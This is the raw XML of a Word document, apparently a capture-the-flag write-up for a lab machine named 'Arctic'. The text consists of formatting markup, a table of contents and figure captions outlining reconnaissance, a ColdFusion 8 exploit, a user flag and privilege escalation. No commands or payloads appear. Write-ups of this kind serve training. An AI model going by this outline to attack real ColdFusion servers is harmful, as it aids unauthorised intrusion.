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48A7A7C5" w:rsidR="00060C0E" w:rsidRPr="00CB3015" w:rsidRDefault="00100B03" w:rsidP="00060C0E">
      <w:pPr>
        <w:pStyle w:val="Titolo"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arctic</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461176"/>
      <w:r w:rsidRPr="00CB3015">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Index</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="51EE5FE4" w14:textId="7EB98582" w:rsidR="008224F8" w:rsidRPr="008224F8"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461176" w:history="1">
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Index</w:t>
        </w:r>
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461176 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidR="008224F8" w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40E19095" w14:textId="081470F4" w:rsidR="008224F8" w:rsidRPr="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461177" w:history="1">
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>List of pictures</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461177 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="28748D68" w14:textId="49BCC0BA" w:rsidR="008224F8" w:rsidRPr="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461178" w:history="1">
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Disclaimer</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461178 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1A618A21" w14:textId="03CEFD21" w:rsidR="008224F8" w:rsidRPr="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461179" w:history="1">
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Reconnaissance</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461179 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2AFCC212" w14:textId="21D46B93" w:rsidR="008224F8" w:rsidRPr="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461180" w:history="1">
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Initial foothold</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461180 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3DADFB37" w14:textId="5998F718" w:rsidR="008224F8" w:rsidRPr="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461181" w:history="1">
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>User flag</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461181 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="568B3C2E" w14:textId="736B0260" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Sommario1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461182" w:history="1">
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Privilege escalation</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461182 \h </w:instrText>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidRPr="008224F8">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4CFEF614" w14:textId="36908A53"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461177"/>
      <w:r w:rsidRPr="00D265A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>List of pictures</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="44B8A653" w14:textId="57167FDF" w:rsidR="008224F8" w:rsidRDefault="008224F8">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461191" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">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_Toc169461191 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AD18A34" w14:textId="158C92DD" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461192" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 2 - Macromedia ColdFusion MX Server remote acceess</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461192 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="53AFD4BE" w14:textId="69ACF19F" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461193" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 3 - ColdFusion version</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461193 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1B814D93" w14:textId="615BFAC7" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461194" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 4 - Exploit ColdFusion 8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461194 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4A89BDFE" w14:textId="2E148DD4" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461195" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 5 - User flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461195 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="214A9EF4" w14:textId="224195B7" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461196" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 6 - Vulnerability to escalate privileges</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461196 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="46C0BCC6" w14:textId="694823E3" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461197" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Figure 7 - Privesc</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461197 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6B16D25E" w14:textId="7E617FE2" w:rsidR="008224F8" w:rsidRDefault="008224F8">
      <w:pPr>
        <w:pStyle w:val="Indicedellefigure"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:noProof/>
          <w:lang w:eastAsia="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc169461198" w:history="1">
        <w:r w:rsidRPr="00AE2A5B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 8 - Root flag</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc169461198 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00FC5FFC">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D0EA927" w14:textId="65914334" w:rsidR="00CB3015" w:rsidRPr="00D265A3" w:rsidRDefault="008224F8">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461178"/>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461179"/>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4AAC9CD3" w14:textId="77777777" w:rsidR="00100B03" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A10A126" wp14:editId="78AE3D81">
            <wp:extent cx="6120130" cy="1946910"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1255294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94825" name="Immagine 1255294825"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1946910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
